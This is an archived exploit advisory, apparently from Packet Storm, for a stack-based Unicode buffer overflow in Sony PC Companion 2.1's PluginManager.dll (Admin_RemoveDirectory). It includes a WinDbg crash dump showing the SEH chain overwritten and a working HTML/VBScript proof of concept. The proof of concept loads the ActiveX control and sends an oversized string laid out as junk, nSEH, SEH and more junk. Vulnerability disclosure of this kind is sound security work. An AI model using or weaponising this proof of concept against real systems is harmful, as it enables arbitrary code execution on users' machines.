exploit the possibilities

Sony PC Companion 2.1 Admin_RemoveDirectory() Unicode Buffer Overflow

Sony PC Companion 2.1 Admin_RemoveDirectory() Unicode Buffer Overflow
Posted Dec 22, 2012
Authored by LiquidWorm | Site zeroscience.mk

Sony PC Companion version 2.1 suffers from a boundary error in PluginManager.dll when handling the value assigned to the 'Path' item in the Admin_RemoveDirectory function and can be exploited to cause a stack-based buffer overflow via an overly long string which may lead to execution of arbitrary code on the affected machine.

tags | exploit, overflow, arbitrary
MD5 | 293584a42c8079634ab7ad1ba3b98c70

Sony PC Companion 2.1 Admin_RemoveDirectory() Unicode Buffer Overflow

Change Mirror Download

Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overload SEH


Vendor: Sony Mobile Communications AB
Product web page: http://www.sonymobile.com
Affected version: 2.10.115 (Production 27.1, Build 830)
2.10.108 (Production 26.1, Build 818)

Summary: PC Companion is a computer application that acts as a portal
to Sony Xperia and operator features and applications, such as phone
software updates, management of contacts and calendar, media management
with Media Go, and a backup and restore feature for your phone content.

Desc: The vulnerability is caused due to a boundary error in PluginManager.dll
when handling the value assigned to the 'Path' item in the Admin_RemoveDirectory
function and can be exploited to cause a stack-based buffer overflow via an
overly long string which may lead to execution of arbitrary code on the affected
machine.


------------------------------------------------------------------------------

STATUS_STACK_BUFFER_OVERRUN encountered
(1e5c.1b34): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=6348e958 ecx=75b1de28 edx=0013e505 esi=00000000 edi=0013ed88
eip=75b1dca5 esp=0013e74c ebp=0013e7c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
KERNEL32!FormatMessageA+0x13c85:
75b1dca5 cc int 3
0:000> !exchain
0013e7b8: KERNEL32!RegSaveKeyExA+3e9 (75b49b72)
0013f114: 00430043
Invalid exception stack at 00420042
0:000> d 0013f114
0013f114 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.
0013f124 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0013f134 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0013f144 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0013f154 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0013f164 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0013f174 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0013f184 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0:000>

------------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2012-5120
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5120.php

http://cwe.mitre.org/data/definitions/121.html


09.11.2012

---


<html>
<body>
<object classid='clsid:BBB7AA7C-DCE4-4F85-AED3-72FE3BCA4141' id='overrun' />
<script language='vbscript'>
targetFile = "C:\Program Files\Sony\Sony PC Companion\PluginManager.dll"
prototype = "Function Admin_RemoveDirectory ( ByVal Path As String ) As tagRemoveDirectoryError"
memberName = "Admin_RemoveDirectory"
progid = "PluginManagerLib.ElevatedTasks"
argCount = 1

Path=String(760, "A") + "BB" + "CC" + String(1000, "D")

' ^ ^ ^ ^
' | | | |
'------------ junk ---- nseh -- seh ------- junk --------

overrun.Admin_RemoveDirectory Path

</script>
</body>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close